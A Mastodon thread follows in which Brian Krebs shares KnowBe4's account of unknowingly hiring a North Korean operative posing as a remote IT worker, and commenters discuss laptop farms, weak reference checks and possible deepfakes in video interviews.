Mastodawn

Wild, true story from the security awareness and training company KnowBe4 that details how they inadvertently hired a North Korean hacker who was posing as a Western tech worker.

Kudos to them for publishing this. If it can happen to a security awareness company, it can happen to anyone (full disclosure: they've been an advertiser on my site for ages).

https://blog.knowbe4.com/how-a-north-korean-fake-it-worker-tried-to-infiltrate-us

How a North Korean Fake IT Worker Tried to Infiltrate Us

How a North Korean Fake IT Worker Tried to Infiltrate Us

Jeff Jul 23, 2024

@briankrebs I do wonder if it's related to this -https://www.abc15.com/news/crime/arizona-woman-charged-in-north-korean-it-worker-scheme-that-raised-millions

Arizona woman charged in North Korean IT worker scheme that raised millions

US federal prosecutors on Thursday charged an Arizona woman with participating in an elaborate fraud scheme to help foreign IT workers pose as Americans and get hired by major US companies.

ABC15 Arizona in Phoenix (KNXV)

EricFate Jul 24, 2024

@WarySec @briankrebs It would not shock me to discover that one of our more erratic remote workers was involved in something like this.

Tay Jul 24, 2024

@WarySec @briankrebs Yes, though likely not the *exact* laptop farm. But that story is the best public detailing of how these laptop farms work. It’s extraordinary, def recommend full indictment PDF

https://github.com/tayvano/lazarus-bluenoroff-research/blob/main/pdfs/2024-05-16_US-v-IT-Workers_cr-00220.pdf

lazarus-bluenoroff-research/pdfs/2024-05-16_US-v-IT-Workers_cr-00220.pdf at main · tayvano/lazarus-bluenoroff-research

a collection of north korean apt articles, analysis and heists attributed to lazarus / bluenoroff / apt38. - tayvano/lazarus-bluenoroff-research

GitHub

Tay Jul 24, 2024

@WarySec @briankrebs also have a highlights thread of said PDF on Twitter (sorry to make y’all choose between long legal pdf and twitter 😅)

https://x.com/tayvano_/status/1791244750173167706

Tay 💖 (@tayvano_) on X

babe wake up new dprk it workers indictment just dropped 😨 https://t.co/rXQaztNllb

X (formerly Twitter)

Jérôme Jul 24, 2024

@tay @WarySec @briankrebs no need to choose, can just get this version without visiting Twitter itself

https://xcancel.com/tayvano_/status/1791244750173167706?mx=2

Hugo Jul 24, 2024

@jerome @tay @WarySec @briankrebs thanka for sharing.

Joe ❌👑Jul 23, 2024

@briankrebs Sounds like they caught him almost as soon as he got a machine and connected to their network, if the blog entry is reporting it correctly. Lucky for them that he messed up immediately and triggered all the alarms.

Tay Jul 24, 2024

@not2b @briankrebs It’s not that he messed up tbh, it’s that they actually proper monitors/logs on employee devices.

The reason dude shamelessly went about installing whatever he wanted and crawling for sensitive dox was bc 99.99% of organizations DON’T detect this type of activity. 😱

They are currently working at thousands of based companies, especially as remote engineers in tech, ai, crypto, etc.

Joe ❌👑Jul 24, 2024

@tay @briankrebs Sure, but if he had started out acting like a normal employee and didn't get more aggressive until he'd built up a rep as a good worker, he might have gotten away with it, even if he trigged an alarm or two. Seems he almost instantly went nuts.

Tay Jul 24, 2024

@not2b @briankrebs Oh, 100%. It’s just that they don’t need to. DPRK guys tend to do *exactly* what is necessary to execute their goals.

For example, we saw resumes, GitHubs rapidly evolve when orgs started to notice mismatched geo’s / work history (and GH started whack-a-moling 🙇‍♀️)

They started interviewing on-cam when orgs began to flag no-cam candidates during initial screens.

No doubt they’ll delay/obfuscate initial activity if orgs start to monitor and detect it, too.

Pete Wright Jul 23, 2024

@briankrebs

This is pretty wild - how common are email-only reference checks? I’ve always done phone call or video call at a minimum, surprised a high profile security vendor would have such a porous background check process like this.

BrianKrebs Jul 23, 2024

@pete_wright IDK. My sense is a ton of companies hire a ton of remote employees all the time, probably many they have never met face to face.

Pete Wright Jul 23, 2024

@briankrebs

yea that's a good point, and i'm not trying to dunk on KB4 (I was a former customer of theirs). i've been at smaller shops for quite a while now so its easier to make sure new hire's have a decent amount of vetting than larger companies.

like you said, glad they posted this publicly as it certainly serves a good wakeup call for larger orgs.

feld Jul 23, 2024

@pete_wright @briankrebs I just had an email-only reference check for a friend a couple months ago. I was prepared for a phone call but they were happy enough to take my email response

BrianKrebs Jul 23, 2024

@feld @pete_wright That's interesting. A lot of times, the only way you'll know something is off is by talking to them, ideally over video so you can match a name with a face and see how they react to different things. I remember a while back reporting on the hack of the FBI's Infragard portal, the feds vetted and approved a fake application in the name of a CEO of a credit rating agency. But they never called the number in the application, even though the fraudster had submitted the CEO's real mobile number in his application!

https://krebsonsecurity.com/2022/12/fbis-vetted-info-sharing-network-infragard-hacked/

FBI’s Vetted Info Sharing Network ‘InfraGard’ Hacked – Krebs on Security

feld Jul 23, 2024

@briankrebs @pete_wright that sounds like a more nefarious version of when I am forced to provide my email to login to a "free WiFi" somewhere and I just use abuse@ their domain

Pete Wright Jul 23, 2024

@briankrebs @feld

oh i remember reading that article - it certainly upped my paranoid meter by a few degrees! :)

chebra Jul 24, 2024

@briankrebs @feld @pete_wright

but here they say

> Our HR team conducted four video conference based interviews on separate occasions, confirming the individual matched the photo provided on their application.

So the photo was modified to match the real person? And that person was actually doing the coding? Or are they using some high quality deepfake for every video call? Because that means more video calls would still not solve it...

feld Jul 24, 2024

@chebra @briankrebs @pete_wright That reminds me a couple years ago we were hiring contractors from Upwork and we caught a guy scamming -- when you setup a call with them you'd get a white dude in America who didn't know anything about the work being done because he was outsourcing the actual work to people in India

dr2chase Jul 24, 2024

@briankrebs heard of attempts at this from a recruiter I talked to at GopherCon two weeks ago.

MrAptronym Jul 24, 2024

@briankrebs wow, they do our security training. Respect them for publishing.

CodeByJeff Jul 24, 2024

@briankrebs seriously, though...

the haircut didn't raise any flags?

FULL-FIFO DEVELOPER 🇺🇦🇨🇿Jul 24, 2024

@codebyjeff @briankrebs it raised eyebrows

Abby Crofton Jul 24, 2024

My work uses this company, this is exactly like one of their learning exercises. Hope they change it up now, it's pretty boring

Aditya Sarangapani Jul 24, 2024

It will be interesting to know how the various checks that KnowBe4 would have used before hiring the employee failed. Can be a valuable learning lesson.

Petrol Jul 24, 2024

@briankrebs I'll definitely be listening to Hacking Humans podcast this week. Here's to hoping they cover it.

Alexander Sosedkin

@briankrebs moral of the story: don't cheap out, use a hardware KVM.

rholland_again-again Jul 24, 2024

@briankrebs Mitnick must be turning in his grave.

Gabe Jul 24, 2024

@briankrebs story is weird, but makes no sense.
"the individual matched the photo provided on their application" - US applications don't usually have photos?
"used a raspberry pi to download the malware" - why not any regular computer, or the company one? Macs with corp-mandated rootkits are easy hacking targets.
"they are actually doing the work, getting paid well" - so why bother with malware?
(And where's the FBI crowing about this, if they were "involved"?)

truh Jul 24, 2024

@gabe @briankrebs maybe the PI was running pi-kvm or a VPN gateway. Otherwise I don't get either why a PI would be involved in downloading the file and how they would know that a PI even was involved.

Also was he circumventing sanctions or doing something malicious?

FULL-FIFO DEVELOPER 🇺🇦🇨🇿Jul 24, 2024

@briankrebs LOL'd at "The scam is that they are actually doing the work"

Ansis Māliņš Jul 24, 2024

@briankrebs It's not clear from the article: did they hire a guy without ever meeting him in person?

ṫẎℭỚ◎ᾔ ṫ◎ℳ Jul 24, 2024

@briankrebs KnowB4 is now KnowAfter